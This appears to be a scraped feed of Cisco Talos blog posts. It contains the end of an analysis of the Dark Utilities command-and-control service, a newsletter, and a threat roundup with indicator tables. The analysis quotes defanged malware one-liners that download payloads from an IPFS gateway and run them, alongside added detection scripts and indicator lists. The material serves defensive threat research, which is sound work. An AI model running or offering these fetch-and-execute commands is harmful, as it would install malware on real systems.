Dark Utilities appears to have been created and is currently managed by a persona that goes under the moniker Inplex-sys. Looking closer into the history of that persona, Talos found several instances where they claimed to be a French speaker, although we observed inplex-sys communicating in English, too. The inplex-sys persona does not have a long history in the cybercriminal underground space. Aside from a brief interaction on the Hack Forums platform, inplex-sys has limited their activity to messaging/bot platforms such as Telegram and Discord. Shortly after the platform was launched, we observed inplex-sys advertising it within the Lapsus$ Group — a high-profile actor that recently had several members arrested — Telegram channel.

Talos also found a record for inplex-sys on a doxxing service called Doxbin, which indicated that their location was in Germany. We assess that this Doxbin entry is either incorrect or was intentionally released as a decoy and that they are indeed located in France. Based on limited interaction and other behavioral revelations, it does appear that inplex-sys is the main persona behind Dark Utilities; however, there is no indication that they developed and manage it entirely on their own.

We observed the same moniker being used on the video game storefront Steam and advertising the Dark Utilities service and others, with links to their respective websites.
Smart Bot is a bot management platform designed for use in launching spam attacks, or "raids" against the Discord and Twitch communication platforms. These attacks are often conducted to disrupt legitimate communications by flooding the platforms with large quantities of spam messages, which could cost streamers revenue. Demo videos uploaded to YouTube show the tool in action against streamers on Twitch.
The Omega Project purports to be a web panel that can be used to administer servers. They offer a free and paid version of the service. The advertisement displayed on the Omega Project website claims that if the Premium service is purchased, customers' servers will be "secure from all backdoors."
The Smart Bot project lists additional individuals as creators of the project. These individuals appear to have a collaborative relationship with inplex-sys, with one of the Smart Bot creators recently publishing a GitHub repository containing a NodeJS API tool to interact with the Dark Utilities platform.


Dark Utilities payload analysis


The Dark Utilities payloads consist of a Python script that has been compiled into either a Windows PE32+ executable or a Linux ELF executable. We decompiled the binaries to obtain the original Python source code for the payloads.

The Linux payload available during our analysis did not actually require the runtime parameter previously described. If no parameter is specified when the executable is launched, it associates the bot with a default owner, presumably associated with the platform developer.
The Python script contains code for Windows and Linux-based systems and first identifies the architecture of the system it is running on, CPU information and other system details. It then determines if the payload can be updated by communicating with the Dark Utilities API to obtain the latest version information available to compare with the version currently running on the system.
If an updated payload is available, the malware will retrieve it via an IPFS gateway, similar to what was previously described.
Next, the payload attempts to achieve persistence on the system allowing it to execute following system reboots. If the infected system is Windows, the malware will create a Registry run key, as shown below.
If the system is a Linux-compatible system, the malware will attempt to locate and remove any existing Kinsing malware and clear the existing Crontab configuration.
It will then create either a Crontab entry or a Systemd service to ensure that the payload is launched following system reboots.
We observed that, in the version analyzed, the alphanumeric string that associates the system with a specific Dark Utilities account is not included when the persistence mechanisms are created, so after a reboot the malware falls back to the default account string described earlier. This issue was observed on both Windows and Linux systems.

The script also contains the code responsible for activating various payload functionality such as cryptocurrency mining, DDoS attacks, etc. If the Monero mining option is deployed, the malware will retrieve XMRig via an IPFS gateway and execute it on the system. The malware uses the Hashvault mining pool and sets a maximum CPU usage value based on the OS of the compromised system.
If Task Manager is launched on the infected machine, the malware attempts to evade detection by terminating the mining process.
The script also defines a class called Attack with subclasses for Layer4 and Layer7 DDoS attack payloads that can be configured and activated via the admin panel previously described. Below are some examples of the payloads defined in the script that target various gaming servers such as "CS:GO," "AmongUs" and TeamSpeak.
The malware uses the following code to handle executing arbitrary system commands using the shell provided in the admin panel. It also supports navigating the filesystem of infected machines via the interface provided by the platform. Python code specified by the adversary can also be executed by the malware payloads.

Malware currently leveraging Dark Utilities


Since the platform was established in early 2022, we have observed a variety of malware samples that leverage Dark Utilities for C2 communications. This includes malware targeting the Windows and Linux operating systems.

In one example, the Stage 1 payload is an executable responsible for dropping a PowerShell script stored within a subfolder of the %TEMP% directory that is also created during Stage 1 execution.
The PowerShell is then executed as follows:
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" –NoProfile -ExecutionPolicy Bypass -File C:\Users\[USERNAME]\AppData\Local\Temp\78E6.tmp\7916.tmp\7956.ps1
The PowerShell is responsible for retrieving the Dark Utilities payload via IPFS and executing it on the system.
An example of the PowerShell syntax used is shown below.
cd C:\Users\$env:UserName\Documents\;mkdir Github;cd C:\Users\$env:UserName\Documents\GitHub\;$uri = ('hxxps[:]//ipfs[.]infura[.]io/ipfs/QmbGk4XnFSY8cn4uHjNq6891uLL1zoPbmTigj7YFyPqA2x');curl $uri -o tcp-client.exe; .\tcp-client.exe M0ImZlMzJldIRzFHcSRIMilAKkkwZi8
The Stage 2 payload (the Dark Utilities Windows payload) is stored within a subdirectory of the Documents folder the PowerShell creates. The payload is then executed and passed the threat actor's alphanumeric string. This results in the system registering under the attacker's Dark Utilities account, granting them full control of the compromised system. In this case, the Dark Utilities platform was accessed via a Tor2Web gateway that enables the infected system to communicate with Dark Utilities without requiring the installation of a Tor client.

We have observed similar implementations targeting other operating systems like Linux, where adversaries are leveraging shell scripts to perform the payload retrieval and execution, similar to the example shown below:
In many cases, the alphanumeric string passed as a parameter differs across samples, which may indicate that multiple distinct threat actors are taking this approach to obtain C2 on compromised systems. The C2 platform itself has moved across various TLDs over time — we have observed samples attempting to retrieve payloads from the site at various points when it was hosted on the ME, XYZ and PW TLDs.
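Every retrieval chain shown in this post (the generated Windows and Linux command strings, and the PowerShell one-liner dropped by the Stage 1 executable) has the same shape: a download tool fetches an object from an IPFS gateway by CID, writes it to disk and launches it with one argument. The Python below is an added detection example written for this post, not Talos's or the platform's code, that scans process command lines (the kind recorded by Sysmon event 1, Windows 4688, auditd execve or EDR telemetry) for that shape. The CID and gateway-URL patterns, the list of download tools and the relative-launch regex are the author's assumptions; the sample lines are the three command strings quoted above plus three constructed lines (one using the subdomain gateway host from the IOC list, one benign IPFS download, one non-IPFS download). Input may be defanged as printed here or live as it appears in logs.

```python
import re
from typing import Optional

# CIDv0 (base58btc, "Qm" + 44 chars) and CIDv1 (base32, "b" + 50 or more chars).
CID = r"(?:Qm[1-9A-HJ-NP-Za-km-z]{44}|b[a-z2-7]{50,})"
# Path-style gateway URLs (".../ipfs/<cid>") and subdomain-style ones ("<cid>.ipfs.<host>").
IPFS_REF = re.compile(r"/ipfs/(" + CID + r")|(" + CID + r")\.ipfs\.")
# Download tools seen in such one-liners; in PowerShell "curl" is an alias of Invoke-WebRequest.
FETCH_TOOL = re.compile(r"\b(?:curl|wget|Invoke-WebRequest|iwr|Invoke-RestMethod|irm)\b", re.I)
# A relative launch (".\name.exe arg" or "./name arg") followed by its first argument.
LAUNCH = re.compile(r"(?:\.\\|\./)([\w.-]+)\s+(\S+)")
OPERATORS = {"&&", "||", ";", "|", "&"}


def refang(line: str) -> str:
    """Turn defanged notation (hxxp, [://], [:], [.]) back into the live form seen in logs."""
    return (line.replace("hxxp", "http").replace("[://]", "://")
                .replace("[:]", ":").replace("[.]", "."))


def analyse(line: str) -> Optional[dict]:
    """Classify one command line; None when it does not fetch anything from IPFS."""
    text = refang(line)
    cids = [a or b for a, b in IPFS_REF.findall(text)]
    if not cids or not FETCH_TOOL.search(text):
        return None
    launches = [(exe, arg) for exe, arg in LAUNCH.findall(text) if arg not in OPERATORS]
    executed = bool(launches) or "chmod +x" in text
    return {
        "verdict": "ipfs_fetch_and_execute" if executed else "ipfs_fetch",
        "cids": cids,
        "executable": launches[-1][0] if launches else None,
        # The first argument is where these payloads receive the account string; it is
        # worth keeping because it differs between samples and clusters them by operator.
        "argument": launches[-1][1] if launches else None,
    }


def scan(lines) -> list:
    """Return (line_number, finding) for every flagged line."""
    return [(n, r) for n, line in enumerate(lines, 1) if (r := analyse(line))]


# Constructed sample input: the three command strings quoted in this post (defanged as
# printed there), one constructed subdomain-gateway variant, one constructed benign IPFS
# download with a made-up CID, and one non-IPFS download.
SAMPLE_LINES = [
    r"cd %userprofile%\Documents && mkdir Steam &&  cd .\Steam &&  curl hxxps[:]//ipfs[.]infura[.]io/ipfs/QmRLaPCGa2HZTxMPQxU2VnB9qda3mUv21TXrjbMNqkxN6Z >> launcher.exe &&  .\launcher.exe [ACCOUNT_STRING_PARAMETER]",
    "cd /tmp/;curl hxxps[:]//ipfs[.]infura[.]io/ipfs/QmVwqSG7TGceZJ6MWnKgYkiyqnW4qTTRq61ADDfMJaPEoG > ./tcp-client;chmod +x tcp-client; ./tcp-client [ACCOUNT_STRING_PARAMETER]",
    r"cd C:\Users\$env:UserName\Documents\;mkdir Github;cd C:\Users\$env:UserName\Documents\GitHub\;$uri = ('hxxps[:]//ipfs[.]infura[.]io/ipfs/QmbGk4XnFSY8cn4uHjNq6891uLL1zoPbmTigj7YFyPqA2x');curl $uri -o tcp-client.exe; .\tcp-client.exe M0ImZlMzJldIRzFHcSRIMilAKkkwZi8",
    "curl hxxps[:]//bafybeidravcab5p3acvthxtwosm4rfpl4yypwwm52s7sazgxaezfzn5xn4[.]ipfs[.]infura-ipfs[.]io/ -o /tmp/.cache; chmod +x /tmp/.cache; /tmp/.cache",
    "wget https://ipfs.io/ipfs/Qm" + "a" * 44 + " -O notes.pdf",   # constructed CID, benign
    "curl https://example.com/release.tgz -o release.tgz && tar xzf release.tgz",
]

if __name__ == "__main__":
    for n, finding in scan(SAMPLE_LINES):
        print(n, finding["verdict"], finding["executable"], finding["argument"])
```

The rule keys on the behaviour (gateway fetch by CID followed by execution) rather than on the specific CIDs or the infura gateway, so a new payload version or a different public gateway is still flagged; the plain "ipfs_fetch" verdict is reported separately because legitimate IPFS downloads do occur and should be triaged with lower priority.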


Conclusion


Although the Dark Utilities platform was recently established, thousands of users have already been enrolled and joined the platform. Given the amount of functionality that the platform provides and the relatively low cost of use, we expect this platform will continue to rapidly expand its user base. This will likely result in an increase in the volume of malware samples in the wild attempting to establish C2 using the platform. Organizations should be aware of these C2aaS platforms and ensure that they have security controls in place to help protect their environments. These platforms provide a variety of sophisticated capabilities to adversaries who may otherwise be unable to develop them on their own. They effectively lower the barrier to entry for cybercriminals entering the threat landscape and enable them to quickly begin launching attacks targeting a variety of operating systems. They also offer multiple methods that can be used to further monetize access gained to systems in corporate environments and could lead to further deployment of malware in the environment once initial access has been obtained.


Coverage


Ways our customers can detect and block this threat are listed below.

Cisco Secure Endpoint (formerly AMP for Endpoints) is ideally suited to prevent the execution of the malware detailed in this post. Try Secure Endpoint for free here.

Cisco Secure Email (formerly Cisco Email Security) can block malicious emails sent by threat actors as part of their campaign. You can try Secure Email for free here.

Cisco Secure Firewall (formerly Next-Generation Firewall and Firepower NGFW) appliances such as Threat Defense Virtual, Adaptive Security Appliance and Meraki MX can detect malicious activity associated with this threat.

Cisco Secure Malware Analytics (Threat Grid) identifies malicious binaries and builds protection into all Cisco Secure products.

Umbrella, Cisco's secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs and URLs, whether users are on or off the corporate network. Sign up for a free trial of Umbrella here.

Cisco Secure Web Appliance (formerly Web Security Appliance) automatically blocks potentially dangerous sites and tests suspicious sites before users access them.

Additional protections with context to your specific environment and threat data are available from the Firewall Management Center.

Cisco Duo provides multi-factor authentication for users to ensure only those authorized are accessing your network.

Open-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org.

The following Snort SIDs are applicable to this threat: 60319 - 60325.

Orbital Queries


Cisco Secure Endpoint users can use Orbital Advanced Search to run complex OSqueries to see if their endpoints are infected with this specific threat. For specific OSqueries on this threat, use the following links:

Windows
Linux


Indicators of Compromise


The following indicators of compromise have been observed associated with malware campaigns leveraging the Dark Utilities platform.

These IOCs can also be found in our Github repository here.

Hashes (SHA256)

Domains

dark-utilities[.]xyz
dark-utilities[.]pw
dark-utilities[.]me
ijfcm7bu6ocerxsfq56ka3dtdanunyp4ytwk745b54agtravj2wr2qqd[.]onion[.]pet
bafybeidravcab5p3acvthxtwosm4rfpl4yypwwm52s7sazgxaezfzn5xn4[.]ipfs[.]infura-ipfs[.]io

Threat Source newsletter (Aug. 4, 2022) — BlackHat 2022 preview

4 August 2022 at 18:00

By Jon Munshaw. 

Welcome to this week’s edition of the Threat Source newsletter. 

After what seems like forever and honestly has been a really long time, we’re heading back to BlackHat in-person this year. We’re excited to see a lot of old friends again to commiserate, hang out, trade stories and generally talk about security.  

Throughout the two days of the main conference, we’ll have a full suite of flash talks at the Cisco Secure booth and several sponsored talks. Since this is the last edition of the newsletter before BlackHat starts, it’s probably worthwhile running through all the cool stuff we’ll have going on at Hacker Summer Camp. 

Our booth should be easy enough to find — it’s right by the main entrance to Bayside B. If you get to the Trellix Lounge, you’ve gone too far north. Our researchers will be there to answer any questions you have and present on a wide variety of security topics, from research into Adobe vulnerabilities to the privacy effects of the overturning of Roe v. Wade. Attendees who watch a lightning talk can grab a never-before-seen Snort 3-themed Snorty and our malware mascot stickers, which were a big hit at Cisco Live this year.

We’ll also be over at the Career Center if you want to come work with us. Or even if you don’t, word on the street is there’ll be silver and gold Snortys there. And on Thursday the 11th between 10 a.m. and noon local time a Talos hiring manager will be on site reviewing resumes and taking questions. 

If you want more in-depth talks, we’ll have five sponsored sessions between the 10th and 11th. If you want the latest schedule and location on those talks, be sure to follow us on Twitter or check out Cisco’s BlackHat event page here. Our sponsored talks cover Talos’ latest work in Ukraine, the growing threat of business email compromise and current trends from state-sponsored actors. Make sure to catch all five of them. 

And if you liked our speakeasy at Cisco Live, you'll love the next secret we have in store at the BlackHat booth. Swing by and ask us about it. 

For anyone sticking around for DEF CON, we’ll also have a presence there with Blue Team Village. Drop any questions in the Blue Team Village Discord for us, and be sure to attend the BTV Pool Party on Aug. 12 from 8 – 11 p.m. local time. 

To stay up to date on all things Talos at both conferences, be sure to follow us on social media.

The one big thing 


Cisco Talos recently discovered a new attack framework called "Manjusaka" being used in the wild. It is advertised as an imitation of the Cobalt Strike framework and could be the next evolution of Cobalt Strike. Although we haven't observed widespread usage of this framework in the wild, it has the potential to be adopted by threat actors all over the world.

Why do I care? 

Our researchers discovered a fully functional version of the command and control (C2) server, written in Go with a user interface in Simplified Chinese, that’s freely available and can easily generate new implants with custom configurations. This increases the likelihood of wider adoption of this framework by malicious actors. If you’re a defender of any kind, you want to stay up on the latest tools attackers are likely to use. And since Cobalt Strike is already one of the most widely used tools out there, it’s safe to assume any evolution of it is going to draw some interest.

So now what? 

Organizations must be diligent against such easily available tools and frameworks, which can be misused by a variety of threat actors. Defense-in-depth strategies based on a risk analysis approach can deliver the best results in preventing the use of this framework. Talos also released Snort rule 60275 and ClamAV signature Win.Trojan.Manjusaka-9956281-1 to detect the use of Manjusaka.


Other news of note


Everything from convenience stores to government websites in Taiwan saw an uptick in cyber attacks this week after U.S. House Speaker Nancy Pelosi visited the country. She was the highest-ranking U.S. official to visit there in more than 20 years. However, many of the attacks appeared to be from low-skilled attackers, and some could even be attributed to a normal uptick in traffic from a busy news day. China could still retaliate for the visit with a cyber attack against Taiwan or the U.S., as the Chinese government has voiced its displeasure over Pelosi’s actions and launched several kinetic warfare exercises. (Reuters, Washington Post)

The U.S. Cybersecurity and Infrastructure Security Agency is warning that attackers are actively exploiting a critical vulnerability in Atlassian Confluence disclosed last week. CISA added CVE-2022-26138, a hardcoded password vulnerability in the Questions for Confluence app, to its list of Known Exploited Vulnerabilities on Friday. Adversaries can exploit this vulnerability to gain total access to data in on-premises Confluence Server and Confluence Data Center platforms. U.S. federal agencies have three weeks to patch the issue under CISA’s new guidance. (Dark Reading, Bleeping Computer)

North Korean state-sponsored actors continue to be active, recently adding a new Gmail attack to their arsenal. The infamous SharpTongue group uses the SHARPEXT malware to target organizations in the U.S., Europe and South Korea that work on nuclear weapons and other topics that North Korea sees as relevant to its national security. SHARPEXT installs a Google Chrome extension that allows the attackers to bypass users’ Gmail multi-factor authentication and passwords, eventually entering the inbox and reading and downloading email and attachments. Other North Korean actors continue to use fake LinkedIn applications to apply for remote jobs, hoping to eventually steal cryptocurrency and fund the country’s weapons program. (Ars Technica, Bloomberg)


Can’t get enough Talos? 


Upcoming events where you can find Talos 


BlackHat USA 2022 (Aug. 6 - 11, 2022)
Las Vegas, Nevada 

USENIX Security '22 (Aug. 10 - 12, 2022)
Las Vegas, Nevada 

DEF CON U.S. (Aug. 11 - 14, 2022)
Las Vegas, Nevada 

Virtual 

Most prevalent malware files from Talos telemetry over the past week  


SHA 256: e4973db44081591e9bff5117946defbef6041397e56164f485cf8ec57b1d8934
MD5: 93fefc3e88ffb78abb36365fa5cf857c
Typical Filename: Wextract
Claimed Product: Internet Explorer
Detection Name: PUA.Win.Trojan.Generic::85.lp.ret.sbx.tg

MD5: 2c8ea737a232fd03ab80db672d50a17a
Typical Filename: LwssPlayer.scr
Claimed Product: 梦想之巅幻灯播放器
Detection Name: Auto.125E12.241442.in02

MD5: 9066dff68c1d66a6d5f9f2904359876c
Typical Filename: dota-15_id3622928ids1s.exe
Claimed Product: N/A
Detection Name: W32.F21B040F7C.in12.Talos

MD5: a087b2e6ec57b08c0d0750c60f96a74c
Typical Filename: AAct.exe
Claimed Product: N/A
Detection Name: PUA.Win.Tool.Kmsauto::1201

MD5: 311d64e4892f75019ee257b8377c723e
Typical Filename: ultrasurf-21-32.exe
Claimed Product: N/A
Detection Name: W32.DFC.MalParent

New SDR feature released for Cisco Secure Email

5 August 2022 at 14:59

Cisco Talos today announced the release of a new mechanism that gives Cisco Secure Email customers the option to submit Sender Domain Reputation (SDR) disputes through TalosIntelligence.com.

Customers now have the option of receiving self-service support through TalosIntelligence.com or may continue engaging with TAC. This new feature improves efficiency for Secure Email customers by streamlining the SDR dispute ticket process.

Users can submit email sender domains and email addresses for investigation if they believe a domain or address should be marked as malicious or has been wrongfully marked as malicious. Please provide as much data as possible to assist our investigation team.

Threat Roundup for July 29 to August 5

5 August 2022 at 19:54

Today, Talos is publishing a glimpse into the most prevalent threats we've observed between July 29 and Aug. 5. As with previous roundups, this post isn't meant to be an in-depth analysis. Instead, this post will summarize the threats we've observed by highlighting key behavioral characteristics, indicators of compromise, and discussing how our customers are automatically protected from these threats.

As a reminder, the information provided for the following threats in this post is non-exhaustive and current as of the date of publication. Additionally, please keep in mind that IOC searching is only one part of threat hunting. Spotting a single IOC does not necessarily indicate maliciousness. Detection and coverage for the following threats is subject to updates, pending additional threat or vulnerability analysis. For the most current information, please refer to your Firepower Management Center, Snort.org, or ClamAV.net.

For each threat described below, this blog post only lists 25 of the associated file hashes and up to 25 IOCs for each category. An accompanying JSON file can be found here that includes the complete list of file hashes, as well as all other IOCs from this post. A visual depiction of the MITRE ATT&CK techniques associated with each threat is also shown. In these images, the brightness of the technique indicates how prevalent it is across all threat files where dynamic analysis was conducted. Five distinct shades are used, with the darkest indicating that no files exhibited the technique's behavior and the brightest indicating that the behavior was observed in 75 percent or more of the files.
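The caveat above, that spotting a single IOC is only one part of threat hunting and that "contacted" domains and addresses do not by themselves indicate maliciousness, is easiest to see with a small matcher. The following is an added example and not code from the Talos post or its JSON tooling: it refangs indicators written in the post's "[.]" style (the Dark Utilities domains earlier on this page and the roundup's per-threat lists, including the CIDR ranges), then checks log lines against them. The entries in DEFANGED_IOCS are a handful of values taken from this page; the log lines, the 203.0.113.x addresses and the example.com names are constructed for the example.

```python
"""Refang defanged IOCs and match them against log lines (added example, not Talos code)."""
import ipaddress
import re

# A handful of indicators from this page, written the way the post defangs them.
# Domains use "[.]"; IP entries may carry a CIDR suffix, as in the Cerber list.
DEFANGED_IOCS = [
    "dark-utilities[.]xyz",   # Dark Utilities domain from the post
    "wequinc[.]pl",           # TrickBot contacted domain from the roundup
    "85[.]93[.]0[.]4",        # Cerber contacted address
    "85[.]93[.]0[.]2/31",     # Cerber contacted range
    "85[.]93[.]4[.]0/25",     # Cerber contacted range
]

# Constructed log lines (proxy, DNS and firewall style); the 203.0.113.x and
# example.com values are documentation addresses/names, not anything from the page.
SAMPLE_LOG = [
    "2022-08-05T10:01:02Z proxy allow host=updates.example.com dst=203.0.113.5",
    "2022-08-05T10:01:09Z dns query name=dark-utilities.xyz type=A",
    "2022-08-05T10:02:15Z fw conn src=10.0.0.12 dst=85.93.0.3:443 proto=tcp",
    "2022-08-05T10:03:00Z proxy allow host=www.example.com dst=203.0.113.9",
    "2022-08-05T10:03:41Z dns query name=wequinc.pl type=A",
    "2022-08-05T10:04:10Z fw conn src=10.0.0.12 dst=85.93.4.77:80 proto=tcp",
]

# Either a dotted-quad IPv4 address (group 1) or a dotted hostname (group 2).
TOKEN_RE = re.compile(
    r"\b((?:\d{1,3}\.){3}\d{1,3})\b|\b([a-z0-9-]+(?:\.[a-z0-9-]+)+)\b", re.I
)


def refang(ioc):
    """Turn a defanged indicator such as '85[.]93[.]0[.]4' back into its real form."""
    return ioc.strip().replace("[.]", ".").replace("(.)", ".").lower()


def load_iocs(defanged):
    """Split refanged IOCs into a set of domains and a list of ip_network objects.

    Single addresses become /32 networks, so one membership test covers both
    plain addresses and the CIDR ranges the roundup lists.
    """
    domains, networks = set(), []
    for raw in defanged:
        value = refang(raw)
        try:
            networks.append(ipaddress.ip_network(value, strict=False))
        except ValueError:
            domains.add(value)  # not parseable as an address or range: treat as a domain
    return domains, networks


def domain_matches(host, domains):
    """True if host equals an IOC domain or is a subdomain of one."""
    labels = host.lower().rstrip(".").split(".")
    return any(".".join(labels[i:]) in domains for i in range(len(labels)))


def scan_line(line, domains, networks):
    """Return the IOC hits found in one log line."""
    hits = []
    for ip_text, host in TOKEN_RE.findall(line):
        if ip_text:
            try:
                addr = ipaddress.ip_address(ip_text)
            except ValueError:
                continue  # e.g. an octet above 255: looks like an address but is not one
            for net in networks:
                if addr in net:
                    hits.append(f"{ip_text} in {net}")
                    break
        elif domain_matches(host, domains):
            hits.append(host.lower())
    return hits


def scan_log(lines, defanged=DEFANGED_IOCS):
    """Map 1-based line numbers to their IOC hits; lines without hits are omitted."""
    domains, networks = load_iocs(defanged)
    report = {}
    for number, line in enumerate(lines, start=1):
        hits = scan_line(line, domains, networks)
        if hits:
            report[number] = hits
    return report


if __name__ == "__main__":
    for number, hits in scan_log(SAMPLE_LOG).items():
        print(f"line {number}: {', '.join(hits)}")
```

Lines 1 and 4 of the constructed log produce no hits even though they look like the real lines around them, while lines 3 and 6 hit only because the Cerber list carries ranges rather than single addresses. Each hit is a lead to pivot on (the process, the parent file, the other indicators for that family in the same table), not a verdict: the post's own tables label contacted domains and addresses as not indicating maliciousness on their own. The list in DEFANGED_IOCS can be replaced with the full set from the accompanying JSON file once its entries are refanged the same way.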

The most prevalent threats highlighted in this roundup are:

Threat Name | Type | Description
Win.Dropper.TrickBot-9958804-0 | Dropper | TrickBot is a banking trojan targeting sensitive information for certain financial institutions. This malware is frequently distributed through malicious spam campaigns. Many of these campaigns rely on downloaders for distribution, such as VB scripts.
Win.Ransomware.Cerber-9958814-0 | Ransomware | Cerber is ransomware that encrypts documents, photos, databases and other important files. Historically, this malware would replace files with encrypted versions and add the file extension ".cerber," although in more recent campaigns other file extensions are used.
Win.Virus.Xpiro-9958895-1 | Virus | Expiro is a known file infector and information-stealer that hinders analysis with anti-debugging and anti-analysis tricks.
Win.Dropper.Remcos-9960040-0 | Dropper | Remcos is a remote access trojan (RAT) that allows attackers to execute commands on the infected host, log keystrokes, interact with a webcam and capture screenshots. This malware is commonly delivered through Microsoft Office documents with macros sent as attachments on malicious emails.
Win.Dropper.Shiz-9958984-0 | Dropper | Shiz is a remote access trojan that allows an attacker to access an infected machine to harvest sensitive information. It is commonly spread via droppers or by visiting a malicious site.
Win.Dropper.HawkEye-9959777-0 | Dropper | HawkEye is an information-stealing malware that targets usernames and passwords stored by web browsers and mail clients on an infected machine. It is commonly spread via email and can also propagate through removable media.
Win.Worm.Kuluoz-9959792-0 | Worm | Kuluoz, sometimes known as "Asprox," is a modular remote access trojan that is also known to download and execute follow-on malware, such as fake antivirus software. Kuluoz is often delivered via spam emails pretending to be shipment delivery notifications or flight booking confirmations.
Win.Dropper.DarkComet-9959797-1 | Dropper | DarkComet and related variants are a family of remote access trojans that provide an attacker with control over an infected system. Capabilities of this malware include the ability to download files from a user's machine, mechanisms for persistence and hiding, and the ability to send back usernames and passwords from the infected system.
Win.Dropper.Ramnit-9960101-0 | Dropper | Ramnit is a banking trojan that monitors web browser activity on an infected machine and collects login information from financial websites. It can also steal browser cookies and attempts to hide from popular antivirus software.

Threat Breakdown

Win.Dropper.TrickBot-9958804-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 46 samples
Mutexes Occurrences
5502606391408671395 4
32899542343072484998 4
1124524871971925691 3
24112587554236391103 3
39744624822682236206 3
23819686304274202058 2
31572222973474305701 2
38648211142506533958 1
33656147683147949452 1
7918010151544240523 1
38748932962513239244 1
Domain Names contacted by malware. Does not indicate maliciousness Occurrences
wequinc[.]pl 4
patardd[.]pl 4
rydedun[.]pl 3
boristh[.]pl 3
lionopp[.]pl 3
matesic[.]pl 2
zanouns[.]pl 2
beryofn[.]pl 1
cabolth[.]pl 1
risiert[.]pl 1
githyet[.]pl 1

File Hashes

01a4f86457a252ffc23117ba653a2093902d0160140a3fda03e3cb9595f6d652 04a8a18b801bf158717c49444c3148f56fb1c23b6781b589106b848fad13557f 04d4ecf05a7bcc6ca0f318bacaa6087ea1e5badc14ca9eebec52aaff791718bc 08a004e94ce71ee0d239e38242283544f530996f4785924f85616040b278bef4 094f5c76889cd9f3f9357d72eda49a962eedc8457a77d586459dbd5968f85aef 0c25f673e25e8c9bb066ae56c41a83e28ef40a9da8327c9f7cd09f663b9a4614 0ef6c2cc035d61abd0f221d2bb8d6c0f5fc1e2e87cd5001f47861435fded326b 12eb4eb5dd38c776ec50166596c5e4ffda47108ce709990ae84a33a3a91776ed 1f14d617fd53588a36cd26c19e6f306fad28bac24140e9083986bb0cac607bc5 2184130eb8a891000fee1e343a5634531d72e05a7893fbafd6d53e52350bae19 23d19c57bacf51421505125da6917c815a1aa0d5c7346cf42c47f6667df0599d 2549d2a70d146340d14d981ecd9c33ce384bc743d4ed258f1eb9740c30792429 26851fc35426f83e70d1542cc4f00a3dd16222de418d2e0727a4ab9d5218c22b 28d1f82ea2f237ae643e442adae17449dadb8ad93397bf2299b0b53abeee45cb 2d05858c463ea267870ff964d9f9779def1ca711586dcfea58745ebe6675ff1f 2d1e5cc0f414d6cc94ec251605c68c32c442740e129d7af97f8293844aecca6a 30636b11d051121251b2051971223e6e294dfaf917338239deb5b8edf5bce20b 39d4446bb6b1c8cbf319fe02f1316897f22a6b00633af1b7e6159dbd7b837556 3a0c89d07193ae260ced7a04873117af0213c43407248d2ff7edf95bd3b32421 3b5e722ae23b3656cfb17fcb9fd218b92c5e4f24c241c3f1c37bded99d92c035 3f32a6229d93292633dc3c9af4dcf7360463cd9fcc72bfc68bfc68afa666316d 4f47c12806778d27afa43905ebb5b2079a451da93237899167d6420333cfe9a8 50543f06717e0d022a4b58043861f0a38ab82e068f07414adc5be142a66c6cec 513125bc77c78f24fc6a29a125c0d5373d5b365f476ba496f90d8dc952fd4441 5584279c960a9a7aeb97ececdb90adc01da3dab0f1fe1cbf8c10e67f14d19c0d
*See JSON for more IOCs

Coverage

Product Protection
Secure Endpoint This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security N/A
Stealthwatch N/A
Stealthwatch Cloud N/A
Secure Malware Analytics This has coverage
Umbrella N/A
WSA N/A

Screenshots of Detection

Secure Endpoint



Secure Malware Analytics



MITRE ATT&CK





Win.Ransomware.Cerber-9958814-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 16 samples
Registry Keys Occurrences
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER
Value Name: Run
16
<HKCU>\SOFTWARE\MICROSOFT\COMMAND PROCESSOR
Value Name: AutoRun
16
<HKCU>\PRINTERS\DEFAULTS\{21A3D5EE-E123-244A-98A1-8E36C26EFF6D} 16
<HKCU>\PRINTERS\DEFAULTS 16
<HKCU>\PRINTERS\DEFAULTS\{21A3D5EE-E123-244A-98A1-8E36C26EFF6D}
Value Name: Component_01
16
<HKCU>\PRINTERS\DEFAULTS\{21A3D5EE-E123-244A-98A1-8E36C26EFF6D}
Value Name: Component_00
16
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: fc
2
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE
Value Name: fc
2
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: ntoskrnl
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE
Value Name: ntoskrnl
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: grpconv
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE
Value Name: grpconv
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: hh
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE
Value Name: hh
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: WerFaultSecure
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE
Value Name: WerFaultSecure
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: javaws
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE
Value Name: javaws
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: at
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE
Value Name: at
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: Dism
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE
Value Name: Dism
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: sc
1
